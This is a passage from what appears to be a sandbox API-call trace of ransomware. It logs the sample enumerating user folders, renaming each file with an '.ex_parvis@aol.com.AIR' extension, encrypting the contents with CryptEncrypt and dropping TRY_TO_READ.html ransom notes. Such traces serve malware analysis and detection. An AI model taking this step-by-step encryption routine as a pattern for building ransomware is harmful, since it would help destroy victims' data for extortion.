HALPmcxz\\Documents\\0lIWJN5A9TmHC9z4d72.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0lIWJN5A9TmHC9z4d72.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0lIWJN5A9TmHC9z4d72.docx" [0161.061] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0lIWJN5A9TmHC9z4d72.docx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0lIWJN5A9TmHC9z4d72.docx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0lIWJN5A9TmHC9z4d72.docx.12781717671972518758.ex_parvis@aol.com.AIR" [0161.061] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0lIWJN5A9TmHC9z4d72.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0liwjn5a9tmhc9z4d72.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0lIWJN5A9TmHC9z4d72.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0liwjn5a9tmhc9z4d72.docx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.064] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0lIWJN5A9TmHC9z4d72.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0liwjn5a9tmhc9z4d72.docx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0161.064] GetProcessHeap () returned 0x2e0000 [0161.064] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0161.064] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=50280) returned 1 [0161.064] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xc468 [0161.064] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.065] GetProcessHeap () returned 0x2e0000 [0161.065] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.065] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.065] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.066] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.066] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.066] ReadFile (in: hFile=0x394, lpBuffer=0x3ae410, nNumberOfBytesToRead=0xc468, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ae410*, lpNumberOfBytesRead=0x2acf9c8*=0xc468, lpOverlapped=0x0) returned 1 [0161.068] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e358 [0161.068] FindNextFileW (in: hFindFile=0x35e358, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.068] FindNextFileW (in: hFindFile=0x35e358, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.068] FindNextFileW (in: hFindFile=0x35e358, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978366d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.068] FindNextFileW (in: hFindFile=0x35e358, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978366d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.068] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.068] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.068] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.069] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned 52 [0161.069] GetProcessHeap () returned 0x2e0000 [0161.069] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xce) returned 0x3470a0 [0161.069] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" [0161.069] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.069] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.072] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b4 [0161.072] GetProcessHeap () returned 0x2e0000 [0161.073] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0161.073] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=282) returned 1 [0161.073] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x11a [0161.073] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.073] GetProcessHeap () returned 0x2e0000 [0161.073] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.073] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.073] WriteFile (in: hFile=0x4b4, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.074] WriteFile (in: hFile=0x4b4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.074] WriteFile (in: hFile=0x4b4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.074] ReadFile (in: hFile=0x4b4, lpBuffer=0x336dd8, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336dd8*, lpNumberOfBytesRead=0x2acf9c8*=0x11a, lpOverlapped=0x0) returned 1 [0161.074] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=-282, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.074] WriteFile (in: hFile=0x4b4, lpBuffer=0x31fae0*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesWritten=0x2acf9c8*=0x11a, lpOverlapped=0x0) returned 1 [0161.074] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e398 [0161.074] FindNextFileW (in: hFindFile=0x35e398, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978366d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.075] FindNextFileW (in: hFindFile=0x35e398, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.075] FindNextFileW (in: hFindFile=0x35e398, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0161.075] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8 [0161.078] FindNextFileW (in: hFindFile=0x35e398, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0161.078] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8 [0161.081] FindNextFileW (in: hFindFile=0x35e398, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0161.081] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8 [0161.083] FindNextFileW (in: hFindFile=0x35e398, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978366d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9785c830, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.083] FindNextFileW (in: hFindFile=0x35e398, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0161.083] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8 [0161.086] FindNextFileW (in: hFindFile=0x35e398, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0161.086] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.086] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.086] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.086] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 52 [0161.086] GetProcessHeap () returned 0x2e0000 [0161.087] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xce) returned 0x3470a0 [0161.087] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" [0161.087] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.087] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.091] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8 [0161.091] GetProcessHeap () returned 0x2e0000 [0161.091] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0161.091] GetFileSizeEx (in: hFile=0x4b8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=402) returned 1 [0161.091] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x192 [0161.091] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.091] GetProcessHeap () returned 0x2e0000 [0161.091] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.091] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.092] WriteFile (in: hFile=0x4b8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.092] WriteFile (in: hFile=0x4b8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.092] WriteFile (in: hFile=0x4b8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.093] ReadFile (in: hFile=0x4b8, lpBuffer=0x3aa428, nNumberOfBytesToRead=0x192, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aa428*, lpNumberOfBytesRead=0x2acf9c8*=0x192, lpOverlapped=0x0) returned 1 [0161.093] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=-402, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.093] WriteFile (in: hFile=0x4b8, lpBuffer=0x3aa5d0*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aa5d0*, lpNumberOfBytesWritten=0x2acf9c8*=0x192, lpOverlapped=0x0) returned 1 [0161.093] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9785c830, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9785c830, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e3d8 [0161.093] FindNextFileW (in: hFindFile=0x35e3d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9785c830, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9785c830, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.093] FindNextFileW (in: hFindFile=0x35e3d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.093] FindNextFileW (in: hFindFile=0x35e3d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0161.093] FindNextFileW (in: hFindFile=0x35e3d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0161.093] FindNextFileW (in: hFindFile=0x35e3d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, 